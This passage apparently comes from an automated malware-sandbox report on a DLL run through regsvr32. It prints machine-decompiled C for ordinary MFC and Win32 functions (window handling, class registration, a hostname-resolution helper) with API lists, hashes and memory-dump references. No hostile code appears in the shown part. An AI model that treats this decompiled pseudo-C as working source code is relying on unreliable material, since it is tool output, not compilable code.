				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				return E1003D2BE(E100246A4(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
			}






                                                                                                                0x10026e8c
                                                                                                                0x10036264
                                                                                                                0x10036269
                                                                                                                0x1003626f
                                                                                                                0x10036274
                                                                                                                0x1003627f
                                                                                                                0x1003628c
                                                                                                                0x10036298
                                                                                                                0x100362b3
                                                                                                                0x100362bc
                                                                                                                0x100362d1
                                                                                                                0x100362df
                                                                                                                0x100362ec
                                                                                                                0x100362fb
                                                                                                                0x1003630d
                                                                                                                0x10036313
                                                                                                                0x10036324

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10036264
                                                                                                                  • Part of subcall function 10024650: __EH_prolog3.LIBCMT ref: 10024657
                                                                                                                  • Part of subcall function 10024650: GetWindowDC.USER32(00000000), ref: 10024683
                                                                                                                • GetClientRect.USER32 ref: 1003627F
                                                                                                                • GetWindowRect.USER32 ref: 1003628C
                                                                                                                  • Part of subcall function 10024274: ScreenToClient.USER32(?,?), ref: 10024288
                                                                                                                  • Part of subcall function 10024274: ScreenToClient.USER32(?,?), ref: 10024291
                                                                                                                • OffsetRect.USER32 ref: 100362B3
                                                                                                                  • Part of subcall function 10023DD2: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 10023DF7
                                                                                                                  • Part of subcall function 10023DD2: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 10023E0C
                                                                                                                • OffsetRect.USER32 ref: 100362D1
                                                                                                                  • Part of subcall function 10023E14: IntersectClipRect.GDI32(?,?,?,?,?), ref: 10023E39
                                                                                                                  • Part of subcall function 10023E14: IntersectClipRect.GDI32(?,?,?,?,?), ref: 10023E4E
                                                                                                                • SendMessageA.USER32 ref: 100362FB
                                                                                                                  • Part of subcall function 100246A4: __EH_prolog3.LIBCMT ref: 100246AB
                                                                                                                  • Part of subcall function 100246A4: ReleaseDC.USER32(?,00000000), ref: 100246C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952362992-0
                                                                                                                • Opcode ID: 454ac3561dfa692294216f166007b473c0e235b98ec0a0c92b2152a655c2891b
                                                                                                                • Instruction ID: 648a23f74cede66d190cf64de6ea21f88aa3542f86f94a7751d6a3377bec6269
                                                                                                                • Opcode Fuzzy Hash: 454ac3561dfa692294216f166007b473c0e235b98ec0a0c92b2152a655c2891b
                                                                                                                • Instruction Fuzzy Hash: E821E972E10519EFDF19DB94DC95DEEB3B8FF08310F404619F556A71A0EA34AA06CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021616 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10021616(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E100215D6();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E10004700();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                                                                0x1002161e
                                                                                                                0x10021626
                                                                                                                0x10021628
                                                                                                                0x10021645
                                                                                                                0x10021653
                                                                                                                0x1002165e
                                                                                                                0x10021660
                                                                                                                0x10021662
                                                                                                                0x10021664
                                                                                                                0x1002166f
                                                                                                                0x10021671
                                                                                                                0x1002167e
                                                                                                                0x1002167e
                                                                                                                0x10021680
                                                                                                                0x10021686
                                                                                                                0x1002168a
                                                                                                                0x100216a8
                                                                                                                0x1002169b
                                                                                                                0x1002169e
                                                                                                                0x100216a0
                                                                                                                0x100216a0
                                                                                                                0x1002168a
                                                                                                                0x100216b1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021666
                                                                                                                0x10021666
                                                                                                                0x10021667
                                                                                                                0x10021669
                                                                                                                0x1002166b
                                                                                                                0x00000000
                                                                                                                0x10021666
                                                                                                                0x10021658
                                                                                                                0x1002165a
                                                                                                                0x1002165c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002165c
                                                                                                                0x1002162a
                                                                                                                0x10021631
                                                                                                                0x10021640
                                                                                                                0x10021640
                                                                                                                0x00000000
                                                                                                                0x10021640
                                                                                                                0x10021633
                                                                                                                0x1002163a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002163c
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 10021648
                                                                                                                • GetParent.USER32(?), ref: 10021656
                                                                                                                • GetParent.USER32(?), ref: 10021669
                                                                                                                • GetLastActivePopup.USER32(?), ref: 10021678
                                                                                                                • IsWindowEnabled.USER32(?), ref: 1002168D
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 100216A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 670545878-0
                                                                                                                • Opcode ID: e93b576b2b0a3dd52bb86e228c6313b0d40743579fd091f4fc51be0184015caf
                                                                                                                • Instruction ID: 3ad509a7b5a95862af2034f189a18abb85d4682610d6dade512639eaa9eb3744
                                                                                                                • Opcode Fuzzy Hash: e93b576b2b0a3dd52bb86e228c6313b0d40743579fd091f4fc51be0184015caf
                                                                                                                • Instruction Fuzzy Hash: 8111A33AA012325BD761DB597D8CB9EB2DDDF75AE1F9A0215ED00E3204EB50DC0046D5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002855A Relevance: 9.1, APIs: 6, Instructions: 53networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E1002855A(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				short _t19;
				intOrPtr* _t30;
				intOrPtr _t37;
				intOrPtr _t39;
				void* _t40;

				E1003D24F(E10053C78, __ebx, __edi, __esi);
				_t39 =  *((intOrPtr*)(_t40 + 8));
				_t30 = __ecx;
				 *0x1006efc8(0x18);
				_t37 = 0;
				 *((intOrPtr*)(_t40 - 0x24)) = 0;
				 *((intOrPtr*)(_t40 - 4)) = 0;
				if(_t39 != 0) {
					_t19 = E1003BB70(0, _t40 - 0x20, 0, 0x10);
					 *((short*)(_t40 - 0x20)) = 2;
					__imp__#11(_t39);
					 *((intOrPtr*)(_t40 - 0x1c)) = _t19;
					if(_t19 != 0xffffffff) {
						L6:
						__imp__#9( *((intOrPtr*)(_t40 + 0xc)));
						 *((short*)(_t40 - 0x1e)) = _t19;
						_t37 =  *((intOrPtr*)( *_t30 + 0x34))(_t40 - 0x20, 0x10);
					} else {
						__imp__#52(_t39);
						if(_t19 == 0) {
							__imp__#112(0x2726);
						} else {
							_t19 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t19 + 0xc))))));
							 *((intOrPtr*)(_t40 - 0x1c)) = _t19;
							goto L6;
						}
					}
					E10015160(_t40 - 0x24);
				} else {
					E10015160(_t40 - 0x24);
				}
				return E1003D2D2(_t30, _t37, _t39);
			}








                                                                                                                0x10028561
                                                                                                                0x10028566
                                                                                                                0x10028569
                                                                                                                0x1002856b
                                                                                                                0x10028571
                                                                                                                0x10028573
                                                                                                                0x10028578
                                                                                                                0x1002857b
                                                                                                                0x10028596
                                                                                                                0x1002859f
                                                                                                                0x100285a5
                                                                                                                0x100285ae
                                                                                                                0x100285b1
                                                                                                                0x100285c8
                                                                                                                0x100285cb
                                                                                                                0x100285d6
                                                                                                                0x100285e2
                                                                                                                0x100285b3
                                                                                                                0x100285b4
                                                                                                                0x100285bc
                                                                                                                0x100285eb
                                                                                                                0x100285be
                                                                                                                0x100285c3
                                                                                                                0x100285c5
                                                                                                                0x00000000
                                                                                                                0x100285c5
                                                                                                                0x100285bc
                                                                                                                0x100285f4
                                                                                                                0x1002857d
                                                                                                                0x10028580
                                                                                                                0x10028585
                                                                                                                0x1002858c

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorH_prolog3_Last_memsetgethostbynamehtonsinet_addr
                                                                                                                • String ID:
                                                                                                                • API String ID: 250079910-0
                                                                                                                • Opcode ID: 67da7948685c6973ebfd6a6a5f8fe7e302c46e150557611234620c0d63483c23
                                                                                                                • Instruction ID: 3d8e11822c02e760ff3703b433370f436c9e02279ebdb974c814a358813cb291
                                                                                                                • Opcode Fuzzy Hash: 67da7948685c6973ebfd6a6a5f8fe7e302c46e150557611234620c0d63483c23
                                                                                                                • Instruction Fuzzy Hash: B3115E389016289FDB01EFA4DC8599EB7B5FF58351F94011AF501EB2A1DB749A44CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D92A Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 38%
                                                                                                                			E1002D92A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}






                                                                                                                0x1002d939
                                                                                                                0x1002d945
                                                                                                                0x1002d947
                                                                                                                0x1002d98a
                                                                                                                0x1002d98a
                                                                                                                0x1002d98c
                                                                                                                0x1002d990
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002d956
                                                                                                                0x1002d96d
                                                                                                                0x1002d973
                                                                                                                0x1002d985
                                                                                                                0x00000000
                                                                                                                0x1002d998
                                                                                                                0x1002d985
                                                                                                                0x1002d987
                                                                                                                0x1002d989
                                                                                                                0x1002d989
                                                                                                                0x1002d995

                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 1002D939
                                                                                                                • GetDlgCtrlID.USER32 ref: 1002D94D
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002D95B
                                                                                                                • GetWindowRect.USER32 ref: 1002D96D
                                                                                                                • PtInRect.USER32(?,?,?), ref: 1002D97D
                                                                                                                • GetWindow.USER32(?,00000005), ref: 1002D98A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1315500227-0
                                                                                                                • Opcode ID: 5deeb6f5bb6289f8b2bc9cec112cdb2c2fb39f7e6379f95622d63d18251a0557
                                                                                                                • Instruction ID: 854212cfedab7418c06117252aceac91f7662d20f60d81996717e7a138de9721
                                                                                                                • Opcode Fuzzy Hash: 5deeb6f5bb6289f8b2bc9cec112cdb2c2fb39f7e6379f95622d63d18251a0557
                                                                                                                • Instruction Fuzzy Hash: 6101AD36140529ABEB02AF54AC48EDE7BACEF097A1F804116F901E6064E731DE41DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100137D0 Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E100137D0(void* __edx) {
				char _v4;
				char _v12;
				intOrPtr* _v16;
				void* __ecx;
				void* __esi;
				signed int _t18;
				signed int _t19;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t40;
				intOrPtr* _t42;
				signed int _t44;

				_push(0xffffffff);
				_push(E1005253E);
				_push( *[fs:0x0]);
				_push(_t29);
				_t18 =  *0x1006dbdc; // 0xdf7c0cda
				_t19 = _t18 ^ _t44;
				_t46 = _t19;
				_push(_t19);
				 *[fs:0x0] =  &_v12;
				_t42 = _t29;
				_v16 = _t42;
				 *_t42 = 0x10059534;
				_v4 = 5;
				E10021AC4(_t42 + 0x22c, _t40, _t42, _t19);
				_v4 = 4;
				E10021AC4(_t42 + 0x1d8, _t40, _t42, _t19);
				_v4 = 3;
				E10021AC4(_t42 + 0x184, _t40, _t42, _t46);
				_v4 = 2;
				E10021AC4(_t42 + 0x130, _t40, _t42, _t46);
				_v4 = 1;
				E10021AC4(_t42 + 0xdc, _t40, _t42, _t46);
				_v4 = 0;
				E10021AC4(_t42 + 0x88, _t40, _t42, _t46);
				_v4 = 0xffffffff;
				_t27 = E1002BDE8(_t28, _t42, __edx, _t40, _t42, _t46);
				 *[fs:0x0] = _v12;
				return _t27;
			}
















                                                                                                                0x100137d0
                                                                                                                0x100137d2
                                                                                                                0x100137dd
                                                                                                                0x100137de
                                                                                                                0x100137e0
                                                                                                                0x100137e5
                                                                                                                0x100137e5
                                                                                                                0x100137e7
                                                                                                                0x100137ec
                                                                                                                0x100137f2
                                                                                                                0x100137f4
                                                                                                                0x100137f8
                                                                                                                0x10013804
                                                                                                                0x1001380c
                                                                                                                0x10013817
                                                                                                                0x1001381c
                                                                                                                0x10013827
                                                                                                                0x1001382c
                                                                                                                0x10013837
                                                                                                                0x1001383c
                                                                                                                0x10013847
                                                                                                                0x1001384c
                                                                                                                0x10013857
                                                                                                                0x1001385c
                                                                                                                0x10013863
                                                                                                                0x1001386b
                                                                                                                0x10013874
                                                                                                                0x10013880

                                                                                                                APIs
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001380C
                                                                                                                  • Part of subcall function 10021AC4: __EH_prolog3.LIBCMT ref: 10021ACB
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001381C
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001382C
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001383C
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001384C
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001385C
                                                                                                                  • Part of subcall function 1002BDE8: __EH_prolog3.LIBCMT ref: 1002BDEF
                                                                                                                  • Part of subcall function 1002BDE8: GlobalFree.KERNEL32(?), ref: 1002BE1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task_impl$H_prolog3$FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 36242457-0
                                                                                                                • Opcode ID: c1ee4041debee2fcbd8d2699e41404807e412528efaa5a475e8330561ac4796d
                                                                                                                • Instruction ID: 61567bc7b6acd54f2e0f60cfcb75ebd6f32bd7061ffc458e35b541a8c442a89d
                                                                                                                • Opcode Fuzzy Hash: c1ee4041debee2fcbd8d2699e41404807e412528efaa5a475e8330561ac4796d
                                                                                                                • Instruction Fuzzy Hash: B9115E38009B819ED315DF24E5517DABBD4EF69710F88490EE4AA533C1EB74660CCBA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001C7A2 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1001C7A2(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E10023187(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E1003BB70(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E10023187(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x10070cb0; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E1001C4BB(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E1001C4BB(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E1001C4BB(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E1001C761(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E1001C761(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E1001A185(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E1001A185(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}



























                                                                                                                0x1001c7a2
                                                                                                                0x1001c7a8
                                                                                                                0x1001c7ad
                                                                                                                0x1001c7b5
                                                                                                                0x1001c7b5
                                                                                                                0x1001c7b8
                                                                                                                0x00000000
                                                                                                                0x1001c7bc
                                                                                                                0x1001c7c2
                                                                                                                0x1001c7c3
                                                                                                                0x1001c7c4
                                                                                                                0x1001c7ce
                                                                                                                0x1001c7d0
                                                                                                                0x1001c7dd
                                                                                                                0x1001c7e0
                                                                                                                0x1001c7e5
                                                                                                                0x1001c7ee
                                                                                                                0x1001c7f1
                                                                                                                0x1001c7f6
                                                                                                                0x1001c7f7
                                                                                                                0x1001c7fa
                                                                                                                0x1001c7fd
                                                                                                                0x1001c802
                                                                                                                0x1001c803
                                                                                                                0x1001c80a
                                                                                                                0x1001c811
                                                                                                                0x1001c816
                                                                                                                0x1001c818
                                                                                                                0x1001c81a
                                                                                                                0x1001c81a
                                                                                                                0x1001c81a
                                                                                                                0x1001c818
                                                                                                                0x1001c81b
                                                                                                                0x1001c81f
                                                                                                                0x1001c821
                                                                                                                0x1001c82b
                                                                                                                0x1001c82c
                                                                                                                0x1001c833
                                                                                                                0x1001c838
                                                                                                                0x1001c83a
                                                                                                                0x1001c83c
                                                                                                                0x1001c83c
                                                                                                                0x1001c83c
                                                                                                                0x1001c83a
                                                                                                                0x1001c83f
                                                                                                                0x1001c843
                                                                                                                0x1001c848
                                                                                                                0x1001c849
                                                                                                                0x1001c84c
                                                                                                                0x1001c853
                                                                                                                0x1001c85a
                                                                                                                0x1001c85f
                                                                                                                0x1001c861
                                                                                                                0x1001c863
                                                                                                                0x1001c863
                                                                                                                0x1001c863
                                                                                                                0x1001c861
                                                                                                                0x1001c866
                                                                                                                0x1001c86a
                                                                                                                0x1001c87a
                                                                                                                0x1001c87d
                                                                                                                0x1001c880
                                                                                                                0x1001c885
                                                                                                                0x1001c887
                                                                                                                0x1001c889
                                                                                                                0x1001c889
                                                                                                                0x1001c889
                                                                                                                0x1001c887
                                                                                                                0x1001c88c
                                                                                                                0x1001c88f
                                                                                                                0x1001c89f
                                                                                                                0x1001c8a6
                                                                                                                0x1001c8ad
                                                                                                                0x1001c8b2
                                                                                                                0x1001c8b4
                                                                                                                0x1001c8b6
                                                                                                                0x1001c8b6
                                                                                                                0x1001c8b6
                                                                                                                0x1001c8b4
                                                                                                                0x1001c8b8
                                                                                                                0x1001c8bc
                                                                                                                0x1001c8c7
                                                                                                                0x1001c8d3
                                                                                                                0x1001c8d5
                                                                                                                0x1001c8d5
                                                                                                                0x1001c8d5
                                                                                                                0x1001c8d5
                                                                                                                0x1001c8dc
                                                                                                                0x1001c8e0
                                                                                                                0x1001c8e8
                                                                                                                0x1001c8f4
                                                                                                                0x1001c8f4
                                                                                                                0x1001c8f4
                                                                                                                0x1001c8f6
                                                                                                                0x1001c8fa
                                                                                                                0x1001c905
                                                                                                                0x1001c911
                                                                                                                0x1001c911
                                                                                                                0x1001c911
                                                                                                                0x1001c918
                                                                                                                0x1001c91b
                                                                                                                0x1001c922
                                                                                                                0x1001c92a
                                                                                                                0x1001c92a
                                                                                                                0x1001c92a
                                                                                                                0x1001c931
                                                                                                                0x1001c934
                                                                                                                0x1001c93b
                                                                                                                0x1001c947
                                                                                                                0x1001c947
                                                                                                                0x1001c947
                                                                                                                0x1001c94e
                                                                                                                0x1001c951
                                                                                                                0x1001c958
                                                                                                                0x1001c964
                                                                                                                0x1001c964
